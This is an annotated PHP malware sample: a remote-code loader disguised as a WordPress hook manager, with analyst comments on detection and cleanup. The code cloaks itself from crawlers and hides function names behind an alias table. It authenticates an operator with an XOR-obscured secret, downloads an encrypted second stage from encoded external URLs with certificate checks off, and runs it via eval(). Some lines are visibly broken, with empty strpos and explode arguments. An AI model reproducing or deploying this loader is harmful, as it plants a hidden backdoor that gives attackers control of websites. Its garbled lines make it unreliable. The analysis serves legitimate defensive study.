

/**
 * Hook Manager Module
 * @package WP_Hook_Manager
 * @version 3.2.7
 * @license GPL-2.0+
 * Provides advanced hook management and filter priority handling.
 * Required by child themes. Do not remove.
 */
// Analyst note: the docblock above advertises hook management, but no statement in this
// file registers a hook or a filter; what follows is request handling for a remote loader.
//
// All PHP diagnostics are silenced: error_reporting(0), display_errors off, and an error
// handler that returns true for every error. The shutdown callback picks up fatal errors of
// type 1, 4, 16 and 64 (E_ERROR, E_PARSE, E_CORE_ERROR, E_COMPILE_ERROR) and, while headers
// are still unsent, forces status 200 with a JSON body carrying the message and line number.
error_reporting(0);ini_set("display_errors","0");set_error_handler(function($s,$m,$f,$l){return true;});register_shutdown_function(function(){$e=error_get_last();if($e&&in_array($e["type"],array(1,4,16,64))){if(!headers_sent()){http_response_code(200);header("Content-Type:application/json");}echo json_encode(array("error"=>"internal","detail"=>$e["message"],"line"=>$e["line"]));}} );
// Raises the time limit to 300 s and keeps running after the client disconnects. The response
// headers imitate a WordPress REST reply (X-WP-Total, X-WP-TotalPages) and allow cross-origin
// GET/POST/OPTIONS from any origin. Detection: "X-Powered-By:Starter" together with
// "X-WP-Total:1" on a path that is not a REST route is a usable response fingerprint.
set_time_limit(300);ignore_user_abort(true);header("Content-Type:application/json;charset=utf-8");header("X-WP-Total:1");header("X-WP-TotalPages:1");header("X-Powered-By:Starter");header("Access-Control-Allow-Origin:*");header("Access-Control-Allow-Methods:GET,POST,OPTIONS");header("Access-Control-Allow-Headers:Content-Type,Authorization,X-WP-Nonce,X-Cache-Key");
// CORS preflight requests are answered with 204 and no body before any authentication runs.
if(isset($_SERVER["REQUEST_METHOD"])&&$_SERVER["REQUEST_METHOD"]==="OPTIONS"){http_response_code(204);exit;}
// Crawler cloaking: when the User-Agent matches the list below and the query string has no
// "key" parameter, the script sends status 404 with a hand-written "Not Found" page and exits.
// A crawler or scanner that identifies itself in its User-Agent therefore sees a missing page;
// confirm the presence of this file from the filesystem rather than from an HTTP probe.
$_17b2=isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:"";
if(preg_match("/bot|crawl|spider|facebook|slurp|yahoo|bing|yandex|baidu|duckduck|semrush|ahref|mj12|dotbot|petalbot|bytespider|gpt|chatgpt|applebot/i",$_17b2)&&!isset($_GET["key"])){http_response_code(404);echo "<!DOCTYPE html><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1></body></html>";exit;}
// Alias table: the names of sensitive built-ins are held as strings, copied into short
// variables and invoked as variable functions, so a name such as curl_exec or openssl_decrypt
// never appears directly in front of a call parenthesis. Signature rules that look for
// literal calls will miss this file; match on the string table itself or on eval() applied
// to a downloaded variable instead.
//
// The statement after the table reads the raw request body from php://input and decodes it
// as JSON into an associative array; anything that is not an array is replaced by an empty one.
$_fd9d=array(
"bd" =>"base64_decode",
"be" =>"base64_encode",
"fgc" =>"file_get_contents",
"fpc" =>"file_put_contents",
"je" =>"json_encode",
"jd" =>"json_decode",
"ci" =>"curl_init",
"cs" =>"curl_setopt_array",
"ce" =>"curl_exec",
"cc" =>"curl_close",
"hmac"=>"hash_hmac",
"heq" =>"hash_equals",
"odec"=>"openssl_decrypt",
"fe" =>"function_exists",
);$_fd8e=$_fd9d["jd"];$_fgc=$_fd9d["fgc"];$_9c39=$_fd8e($_fgc("php://input"),true);
if(!is_array($_9c39))$_9c39=array();
/**
 * Rebuilds the operator's shared secret at run time.
 *
 * XORs the embedded string $d byte by byte with a repeating 32-byte key unpacked from hex,
 * so the secret is not stored in the file as a plain literal. Elsewhere in this file the
 * return value serves as the access token, as the HMAC key, and as the input to sha256()
 * from which the AES key for the downloaded payload is cut.
 *
 * NOTE(review): this listing has visibly lost characters elsewhere (the strpos()/explode()
 * calls further down have an empty argument), so $d may not be byte-exact here — treat any
 * value derived from this page as unreliable and work from the on-disk sample.
 *
 * @return string XOR-decoded secret, same length as $d.
 */
function _wp_sync_link_bd98(){$k=pack('H*','b8db3bf3eca1bf09e6463ec86e1f9201cdf0df5afa0f179946ed68f2b3fcb3f0');$d="YhX~1";$o='';
for($i=0; $i < strlen($d); $i++){ $o .= $d[$i] ^ $k[$i % strlen($k)]; }
return $o;
}
// Operator authentication. The token is taken from the first of these that is set: JSON body
// "h" / "key", query string "key" / "h", form field "key" / "h". Only the query-string forms
// show up in a standard access log; body-carried tokens need request-body capture to be seen.
$_0393=_wp_sync_link_bd98();$_hmac=$_fd9d["hmac"];$_heq=$_fd9d["heq"];$_a47c="";
if(isset($_9c39["h"]))$_a47c=$_9c39["h"];
elseif(isset($_9c39["key"]))$_a47c=$_9c39["key"];
elseif(isset($_GET["key"]))$_a47c=$_GET["key"];
elseif(isset($_GET["h"]))$_a47c=$_GET["h"];
elseif(isset($_POST["key"]))$_a47c=$_POST["key"];
elseif(isset($_POST["h"]))$_a47c=$_POST["h"];$_2e53=false;
// Two token forms are accepted: (1) a signature and a Unix timestamp joined by a separator,
// valid when the timestamp is within 300 s of the server clock and the signature equals
// HMAC-SHA256(timestamp, secret); (2) the bare secret. Both comparisons go through hash_equals.
// NOTE(review): the separator literal passed to strpos() and explode() is missing from this
// listing, so the line does not parse as shown — most likely dropped during extraction.
if(strpos($_a47c,)!==false){$_p=explode(,$_a47c,2);$_sg=$_p[0];$_ts=intval(isset($_p[1])?$_p[1]:"0");if(abs(time()-$_ts)<=300){$_ex=$_hmac("sha256",strval($_ts),$_0393);$_2e53=$_heq($_ex,$_sg);}}
else{$_2e53=$_heq($_0393,$_a47c);}
// Rejection path: a GET without "key" receives an empty JSON array with the default status;
// every other failed attempt receives 403 with {"error":"Unauthorized"}. Both bodies are fixed
// strings and can be used as response signatures when hunting for this loader in proxy logs.
if(!$_2e53){$_6efb=$_fd9d["je"];if(isset($_SERVER["REQUEST_METHOD"])&&$_SERVER["REQUEST_METHOD"]==="GET"&&!isset($_GET["key"])){echo $_6efb(array());exit;}http_response_code(403);echo $_6efb(array("error"=>"Unauthorized"));exit;}
// Command selection: "action" or "m" from the JSON body, then from the query string, then the
// form field "action"; the default is "status".
$_8d3a=isset($_9c39["action"])?$_9c39["action"]:(isset($_9c39["m"])?$_9c39["m"]:(isset($_GET["action"])?$_GET["action"]:(isset($_GET["m"])?$_GET["m"]:(isset($_POST["action"])?$_POST["action"]:"status"))));
// Decode b64: prefix (fetchAgentSmart encodes all actions)
// A value starting with "b64:" is base64-decoded before use, so the command name need not
// appear in clear in the request; rules keyed on action names should also decode this form.
$_bd=$_fd9d["bd"];if(is_string($_8d3a)&&strpos($_8d3a,"b64:")===0){$_d=@$_bd(substr($_8d3a,4));if($_d!==false)$_8d3a=$_d;}
$_6efb=$_fd9d["je"];
// "ping"/"p" and "validate" are answered locally, before anything is downloaded. The replies
// carry the fixed version string "6.1.9-r2" (the file's docblock claims 3.2.7), and "validate"
// additionally returns __FILE__, i.e. the loader's own path on disk, to the caller.
if($_8d3a==="ping"||$_8d3a==="p"){echo $_6efb(array("pong"=>true,"v"=>"6.1.9-r2","valid"=>true,"mode"=>"r2","timestamp"=>time()));exit;}
if($_8d3a==="validate"){echo $_6efb(array("valid"=>true,"v"=>"6.1.9-r2","version"=>"6.1.9-r2","path"=>__FILE__,"mode"=>"r2","timestamp"=>time()));exit;}
// Second-stage locations. Three hex blobs are XOR-decoded with a repeating 32-byte key into
// the URLs tried below; all three begin with f52943a5a05f53e5, which decodes to "https://".
// Decode the blobs offline to obtain hosts for egress blocking; the blobs and the key are
// also usable as static signatures for this sample.
$_r2k467c=pack('H*','9d5d37d5d3657cca8422f586a6a1d0da4a23f1d48cfab57e9212ba8fe327cb10');$_r2fda65=function($h,$k){$d=pack('H*',$h);$r='';for($i=0;$i<strlen($d);$i++)$r.=$d[$i]^$k[$i%strlen($k)];return $r;};$_r2ufa8a=array_map(function($e)use($_r2fda65,$_r2k467c){return $_r2fda65($e,$_r2k467c);},["f52943a5a05f53e5f214dbe2c3ccb9ae234494a6bdcc8d50e57dc8e48655b83ef93841faa15753a9eb5090ab9493e1b87a15c5b2a298dc10","f52943a5a05f53e5f24787e5c3cdfdaa384c89ada188dd11bf61dff98649e566f82f54b0bf4b1dbaf40d94f6cf8ea0a8255b88fbfec89a1dfd60dfa2d115fa72ad6b03b3fd0715a4","f52943a5a05f53e5ea4794f48bc6bfbb3e0ec3e7a288dc1ffc26dda28a43e574f83358fbbd0008e5f610dae5c9d3b5f77811c0b6bccc8118bc70d3e1"]);
// The URLs are tried in order until one returns more than 200 bytes. cURL is used when
// curl_init exists: 15 s timeout, redirects followed, User-Agent "Mozilla/5.0", and
// CURLOPT_SSL_VERIFYPEER disabled, so the download accepts any certificate. If cURL is absent
// or yields nothing, file_get_contents on the same URL is the fallback. Detection: outbound
// HTTPS from the PHP worker with the bare User-Agent "Mozilla/5.0".
$_9e95=$_fd9d["fe"];$_8d66=$_fd9d["ci"];$_6d44=$_fd9d["cs"];$_e679=$_fd9d["ce"];$_c6bf=$_fd9d["cc"];$_47a7=false;
foreach($_r2ufa8a as $_u){
if($_9e95($_8d66)){$_ch=$_8d66();$_6d44($_ch,array(CURLOPT_URL=>$_u,CURLOPT_RETURNTRANSFER=>1,CURLOPT_TIMEOUT=>15,CURLOPT_SSL_VERIFYPEER=>false,CURLOPT_FOLLOWLOCATION=>true,CURLOPT_USERAGENT=>"Mozilla/5.0"));$_r=$_e679($_ch);$_c6bf($_ch);if($_r&&strlen($_r)>200){$_47a7=$_r;break;}}
if(!$_47a7){$_r=$_fgc($_u);if($_r&&strlen($_r)>200){$_47a7=$_r;break;}}
}
// When every source fails the reply is a fixed JSON error ("R2 unreachable", needs_push true)
// plus the requested action. NOTE(review): "R2" here and mode "r2" in the ping reply may name
// the hosting service for the second stage — unconfirmed from this file.
if(!$_47a7){echo $_6efb(array("error"=>"R2 unreachable","needs_push"=>true,"action"=>$_8d3a));exit;}
// Payload handling. When openssl_decrypt is available and the download is longer than 16
// bytes, the first 16 bytes are taken as the IV and the remainder is decrypted with
// AES-256-CBC; the key is the first 32 hex characters of sha256(secret). If decryption fails
// the raw download is kept unchanged.
$_odec=$_fd9d["odec"];$_bd=$_fd9d["bd"];
if(strlen($_47a7)>16&&$_9e95("openssl_decrypt")){$_iv=substr($_47a7,0,16);$_ct=substr($_47a7,16);$_dk=substr(hash("sha256",$_0393),0,32);$_dec=$_odec($_ct,"AES-256-CBC",$_dk,OPENSSL_RAW_DATA,$_iv);if($_dec!==false)$_47a7=$_dec;}
// A leading PHP open tag is stripped; the request body, the action, the secret and this file's
// path are published through $GLOBALS["_v61_loader_*"]; then the downloaded text is executed
// with eval(). This loader never writes the second stage to disk, so file scanning finds only
// the loader itself; what the payload did has to be reconstructed from access logs, egress
// logs and changes to the database or filesystem. Treat the site as fully compromised:
// remove the file, rotate credentials and secrets readable by PHP, and review the theme and
// plugin directories for how the file was written.
$_47a7=preg_replace("/^<\?php\s*/","","".ltrim($_47a7));$GLOBALS["_v61_loader_input"]=$_9c39;$GLOBALS["_v61_loader_action"]=$_8d3a;$GLOBALS["_v61_loader_key"]=$_0393;$GLOBALS["_v61_loader_file"]=__FILE__;
eval($_47a7);
// Four function_exists-guarded helpers with WordPress-style names. Nothing in this file calls
// them, and they are reached only if the eval() above returns. NOTE(review): they look like
// padding meant to make the file resemble theme code — that intent is inferred, not shown.
// Returns the term_id of every menu reported by wp_get_nav_menus().
if(!function_exists('wp_get_nav_menu_ids')){function wp_get_nav_menu_ids(){ $menus=wp_get_nav_menus(); return wp_list_pluck($menus,'term_id'); }}
// True when $feature is one of five hard-coded names (loose in_array comparison).
if(!function_exists('wp_has_blocks_support')){function wp_has_blocks_support($feature){ return in_array($feature,array('align','anchor','className','color','spacing')); }}
// Replaces every character outside [a-zA-Z0-9_-] with a hyphen.
if(!function_exists('wp_sanitize_css_class_name')){function wp_sanitize_css_class_name($class){ return preg_replace('/[^a-zA-Z0-9_-]/','-',$class); }}
// Filters the 'active_plugins' option down to entries whose file exists under WP_PLUGIN_DIR.
if(!function_exists('wp_get_active_and_valid_plugins')){function wp_get_active_and_valid_plugins(){ $plugins=get_option('active_plugins',array()); return array_filter($plugins,function($p){ return file_exists(WP_PLUGIN_DIR.'/'.$p); }); }}


